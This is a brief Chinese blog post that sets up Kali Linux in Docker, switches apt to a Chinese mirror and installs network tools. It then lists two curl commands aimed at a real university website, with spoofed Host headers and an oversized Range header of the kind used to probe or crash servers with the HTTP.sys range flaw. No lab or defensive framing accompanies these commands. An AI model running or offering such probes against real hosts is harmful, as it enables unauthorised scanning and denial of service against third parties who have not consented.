侧边栏壁纸
博主头像
★街角晚灯★博主等级

博观而约取 厚积而薄发

  • 累计撰写 438 篇文章
  • 累计创建 181 个标签
  • 累计收到 0 条评论

目 录CONTENT

文章目录

KaLi Linux渗透系统

WinJay
2021-11-04 / 0 评论 / 0 点赞 / 120 阅读 / 1847 字 / 正在检测是否收录...
温馨提示:
文章发布较早,内容可能过时,阅读注意甄别。。。。

KaLi Linux

KaLi Linux

docker pull kalilinux/kali-rolling

docker run -d --name KaLi  --hostname KaLi kalilinux/kali-rolling 

docker exec -it KaLi /bin/bash
# 更换国内源
echo 'deb http://mirrors.163.com/debian/ buster main non-free contrib\\r\\ndeb http://mirrors.163.com/debian/ buster-updates main non-free contrib\\r\\ndeb http://mirrors.163.com/debian/ buster-backports main non-free contrib\\r\\ndeb-src http://mirrors.163.com/debian/ buster main non-free contrib\\r\\ndeb-src http://mirrors.163.com/debian/ buster-updates main non-free contrib\\r\\ndeb-src http://mirrors.163.com/debian/ buster-backports main non-free contrib\\r\\ndeb http://mirrors.163.com/debian-security/ buster/updates main non-free contrib\\r\\ndeb-src http://mirrors.163.com/debian-security/ buster/updates main non-free contrib\\r\\n' > /etc/apt/sources.list
# 更新系统
apt-get update -y && apt-get upgrade -y
apt update && apt -y install curl net-tools  iputils-ping telnet/oldstable

curl http://gkxk.zbvc.edu.cn/ -H "Host: 222.194.183.239" -H "Range: bytes=0-18446744073709551615"

curl http://gkxk.zbvc.edu.cn/ -H "Host: 219.153.116.43" -H "Range: bytes=0-18446744073709551615"

参考1

image.png

参考2 image.png

0

评论区